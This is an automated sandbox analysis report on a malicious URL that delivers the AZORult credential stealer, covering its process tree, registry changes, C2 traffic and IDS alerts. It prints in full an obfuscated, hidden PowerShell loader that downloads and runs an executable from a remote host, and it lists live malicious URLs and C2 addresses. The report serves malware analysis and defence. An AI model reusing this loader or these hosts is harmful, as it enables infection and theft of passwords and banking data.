URL:

http://91.90.195.48/dZRj3L

Full analysis: https://app.any.run/tasks/e1a0e8fd-4772-47de-9196-cc33cd491f59
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Analysis date: May 23, 2019, 23:27:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
azorult
loader
evasion
Indicators:
MD5:

71EF13BB378B4EDE6BCCBFAD08222D9A

SHA1:

6DFEDF8A2015A5585E683457F70059F3F2087F36

SHA256:

3C1577C2D57091A0AC3722D0DCD3499C27405551D6C9F5C2459DAB6C90DABEC0

SSDEEP:

3:N1K0lH03PWp:C0lum

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • PcqYbgWA.tmp (PID: 3184)
      • PcqYbgWA.tmp (PID: 3576)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 932)
    • AZORULT was detected

      • PcqYbgWA.tmp (PID: 3184)
    • Loads dropped or rewritten executable

      • PcqYbgWA.tmp (PID: 3184)
    • Connects to CnC server

      • PcqYbgWA.tmp (PID: 3184)
    • Actions looks like stealing of personal data

      • PcqYbgWA.tmp (PID: 3184)
  • SUSPICIOUS

    • Executed via COM

      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3936)
    • Executes PowerShell scripts

      • iexplore.exe (PID: 3364)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 932)
      • PcqYbgWA.tmp (PID: 3184)
    • Starts application with an unusual extension

      • PcqYbgWA.tmp (PID: 3576)
      • powershell.exe (PID: 932)
    • Reads Internet Cache Settings

      • PcqYbgWA.tmp (PID: 3184)
    • Connects to server without host name

      • PcqYbgWA.tmp (PID: 3184)
    • Starts CMD.EXE for commands execution

      • PcqYbgWA.tmp (PID: 3184)
    • Reads the cookies of Google Chrome

      • PcqYbgWA.tmp (PID: 3184)
    • Reads the cookies of Mozilla Firefox

      • PcqYbgWA.tmp (PID: 3184)
    • Checks for external IP

      • PcqYbgWA.tmp (PID: 3184)
    • Starts CMD.EXE for self-deleting

      • PcqYbgWA.tmp (PID: 3184)
  • INFO

    • Application launched itself

      • iexplore.exe (PID: 3612)
    • Changes internet zones settings

      • iexplore.exe (PID: 3612)
    • Creates files in the user directory

      • iexplore.exe (PID: 3364)
      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3936)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3364)
      • iexplore.exe (PID: 3984)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3364)
      • iexplore.exe (PID: 3612)
      • iexplore.exe (PID: 3984)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3612)
    • Changes settings of System certificates

      • iexplore.exe (PID: 3612)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 3612)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
11
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe flashutil32_26_0_0_131_activex.exe no specs powershell.exe iexplore.exe csc.exe no specs cvtres.exe no specs pcqybgwa.tmp no specs #AZORULT pcqybgwa.tmp cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
932powershell.exe -w hidden -noni -enc WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBVADMAbAB6AGQARwBWAHQATABrADEAaABiAG0ARgBuAFoAVwAxAGwAYgBuAFEAdQBRAFgAVgAwAGIAMgAxAGgAZABHAGwAdgBiAGkANQBCAGIAWABOAHAAVgBYAFIAcABiAEgATQA9ACcAKQApACkALgBHAGUAdABGAGkAZQBsAGQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAWQBXADEAegBhAFUAbAB1AGEAWABSAEcAWQBXAGwAcwBaAFcAUQA9ACcAKQApACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACQAdAByAHUAZQApADsAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAiAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbABsAEkAbAAxADEAbABsAEkAewBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJAGwAMQBJAGwAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJADEAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsAEkAMQAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsAGwAbAAxAEkAOwB9AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AVQBuAGkAYwBvAGQAZQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbABsADEAMQB7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABsADEAMQBJAGwAMQBJADEASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAEkASQBJAEkASQBsADEAMQBsADEAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsADEAbAAxAGwAbABsAEkASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJADEAbABJAEkAMQAxAGwASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwAMQBsAEkASQAxAEkASQAxAGwASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwASQAxAEkASQBsAGwAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbAAxAEkASQBJAEkAMQBsAEkASQBJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbAAxAEkAbABJADEAMQAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQAxADEASQBsAGwAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsADEAMQBsAGwASQBsADEAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsADEAMQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQAxADEAbAA7AHAAdQBiAGwAaQBjACAAcwBoAG8AcgB0ACAAbAAxAGwASQAxADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABsAGwAbABJAEkAbABJADEAMQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQBJAEkAbAAxADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbAAxAEkASQAxADEASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsADEASQBsAEkAMQBJAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAEkAMQBJADEASQBJAEkASQBsAEkAOwB9ADsAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGwAbABsADEASQAxAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACIALABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACgAcwB0AHIAaQBuAGcAIABsADEAMQAxADEASQAxAEkALABzAHQAcgBpAG4AZwAgAEkAMQBJADEAbAAxACwASQBuAHQAUAB0AHIAIABJAGwAbABJAEkASQBsADEAMQAxACwASQBuAHQAUAB0AHIAIABsAGwASQBsADEASQAxADEAMQAsAGIAbwBvAGwAIABJAGwASQBsAGwAMQBJACwAdQBpAG4AdAAgAGwASQAxADEASQBsADEALABJAG4AdABQAHQAcgAgAGwAMQBsAEkAbABsADEAbABsAGwASQAxACwAcwB0AHIAaQBuAGcAIABJAEkAMQAxAEkAMQBsADEALAByAGUAZgAgAGwAbABsADEAMQAgAEkAMQBJAGwAbAAxADEASQAsAG8AdQB0ACAAbABsAGwASQBsADEAMQBsAGwASQAgAEkAbABsAGwAbAAxAGwAbABJADEAKQA7AH0AIgA7ACQAbABsAEkAbAAxADEAbABsAGwAPQAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAEwAbwB3AFwAJAAoAC0AagBvAGkAbgAoACgANAA4AC4ALgA1ADcAKQArACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAOAB8ACUAewBbAGMAaABhAHIAXQAkAF8AfQApACkALgB0AG0AcAAiADsAJABJAEkAMQBJAGwAMQBsAGwAMQAxAGwAMQA9ACcAaAB0AHQAcAA6AC8ALwBjAHUAbgBuAGkAbgBnAHIAYQBjAG8AbwBuAC4AaQBuAGYAbwAvADQAZABEAFUALwBYAGwAVABZAC4AYwBmAG0AbAA/AEwAawBrAGUAVwAzAD0AOAA5ADgAMgAnADsAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEoARwBOAHMAYQBUADAAbwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBPAFoAWABRAHUAVgAyAFYAaQBRADIAeABwAFoAVwA1ADAASwBUAHMAawBZADIAeABwAEwAawBoAGwAWQBXAFIAbABjAG4ATgBiAEoAMQBWAHoAWgBYAEkAdABRAFcAZABsAGIAbgBRAG4AWABUADAAbgBSAGsARQA1AFcAbABaAFAAZABFAEoAMwBRAGsAbAA0AFoARABoADYATQBpAGMANwBKAEcATgBzAGEAUwA1AEUAYgAzAGQAdQBiAEcAOQBoAFoARQBaAHAAYgBHAFUAbwBKAEUAbABKAE0AVQBsAHMATQBXAHgAcwBNAFQARgBzAE0AUwB3AGsAYgBHAHgASgBiAEQARQB4AGIARwB4AHMASwBUAHMAPQAnACkAKQB8AGkAZQB4ADsAJABsADEASQAxAGwASQBJAGwAbAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAbAAxADEAOwAkAGwAMQBJADEAbABJAEkAbABsAC4AbAAxAGwASQAxAD0AMAB4ADAAOwAkAGwAMQBJADEAbABJAEkAbABsAC4ASQBsAGwAMQAxAEkAbAAxAEkAMQBJAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAGwAMQBJADEAbABJAEkAbABsACkAOwAkAGwAbABJAGwASQAxAGwAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAbABsAGwASQBsADEAMQBsAGwASQA7AFsAbABsAGwAMQBJADEAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAEkAbAAxADEAbABsAGwALAAkAGwAbABJAGwAMQAxAGwAbABsACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAGwAMQBJADEAbABJAEkAbABsACwAWwByAGUAZgBdACQAbABsAEkAbABJADEAbAApAHwAbwB1AHQALQBuAHUAbABsADsAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
1812C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES30CD.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC30CC.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
2084"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PcqYbgWA.tmp"C:\Windows\system32\cmd.exePcqYbgWA.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2848"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\s-sxgvul.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3184C:\Users\admin\AppData\LocalLow\PcqYbgWA.tmpC:\Users\admin\AppData\LocalLow\PcqYbgWA.tmp
PcqYbgWA.tmp
User:
admin
Integrity Level:
LOW
Exit code:
0
Modules
Images
c:\users\admin\appdata\locallow\pcqybgwa.tmp
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
3364"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3612 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3400C:\Windows\system32\timeout.exe 3 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
3576C:\Users\admin\AppData\LocalLow\PcqYbgWA.tmpC:\Users\admin\AppData\LocalLow\PcqYbgWA.tmppowershell.exe
User:
admin
Integrity Level:
LOW
Exit code:
0
Modules
Images
c:\users\admin\appdata\locallow\pcqybgwa.tmp
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
3612"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3936C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -EmbeddingC:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Installer/Uninstaller 26.0 r0
Exit code:
0
Version:
26,0,0,131
Modules
Images
c:\windows\system32\macromed\flash\flashutil32_26_0_0_131_activex.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
Total events
801
Read events
703
Write events
93
Delete events
5

Modification events

(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000071000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation:writeName:{5CDCCEFD-7DB2-11E9-A09E-5254004A04AF}
Value:
0
(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Type
Value:
4
(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Count
Value:
1
(PID) Process:(3612) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Time
Value:
E30705000400170017001B002C00C600
Executable files
49
Suspicious files
0
Text files
22
Unknown types
26

Dropped files

PID
Process
Filename
Type
3612iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
3612iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@91.90.195[1].txt
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\0KZCO8Z5\uPmVz[1].txt
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O3L0JKC1\4231-nutrilite-manakin[1].jspx
MD5:
SHA256:
3364iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O3L0JKC1\1962_08_13[1].aspx
MD5:
SHA256:
3936FlashUtil32_26_0_0_131_ActiveX.exeC:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx:Zone.Identifier
MD5:
SHA256:
3936FlashUtil32_26_0_0_131_ActiveX.exeC:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx
MD5:
SHA256:
3612iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF86085C6DB260101D.TMP
MD5:
SHA256:
3612iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{5CDCCEFE-7DB2-11E9-A09E-5254004A04AF}.dat
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
10
DNS requests
3
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3184
PcqYbgWA.tmp
POST
200
217.8.117.16:80
http://217.8.117.16/3A38D670-F0E0-436D-8A00-FC71822F4632/index.php
unknown
binary
4.27 Mb
malicious
3184
PcqYbgWA.tmp
GET
200
185.194.141.58:80
http://ip-api.com/json
DE
text
321 b
malicious
3364
iexplore.exe
GET
302
91.90.195.48:80
http://91.90.195.48/dZRj3L
NL
unknown
3184
PcqYbgWA.tmp
POST
200
217.8.117.16:80
http://217.8.117.16/3A38D670-F0E0-436D-8A00-FC71822F4632/index.php
unknown
text
2 b
malicious
932
powershell.exe
GET
200
68.183.179.105:80
http://cunningracoon.info/4dDU/XlTY.cfml?LkkeW3=8982
US
executable
150 Kb
suspicious
3612
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3612
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3364
iexplore.exe
91.90.195.48:80
ITL Company
NL
unknown
3364
iexplore.exe
68.183.179.105:443
cunningracoon.info
DSL Extreme
US
suspicious
3612
iexplore.exe
68.183.179.105:443
cunningracoon.info
DSL Extreme
US
suspicious
3984
iexplore.exe
68.183.179.105:443
cunningracoon.info
DSL Extreme
US
suspicious
3184
PcqYbgWA.tmp
185.194.141.58:80
ip-api.com
netcup GmbH
DE
unknown
3184
PcqYbgWA.tmp
217.8.117.16:80
malicious
932
powershell.exe
68.183.179.105:80
cunningracoon.info
DSL Extreme
US
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
cunningracoon.info
  • 68.183.179.105
suspicious
ip-api.com
  • 185.194.141.58
malicious

Threats

PID
Process
Class
Message
932
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3184
PcqYbgWA.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult.Stealer HTTP Header
3184
PcqYbgWA.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult Request
3184
PcqYbgWA.tmp
Potentially Bad Traffic
ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
3184
PcqYbgWA.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult Response
3184
PcqYbgWA.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult.Stealer HTTP Header
3184
PcqYbgWA.tmp
Potential Corporate Privacy Violation
ET POLICY External IP Lookup ip-api.com
3184
PcqYbgWA.tmp
Potentially Bad Traffic
ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
1 ETPRO signatures available at the full report
No debug info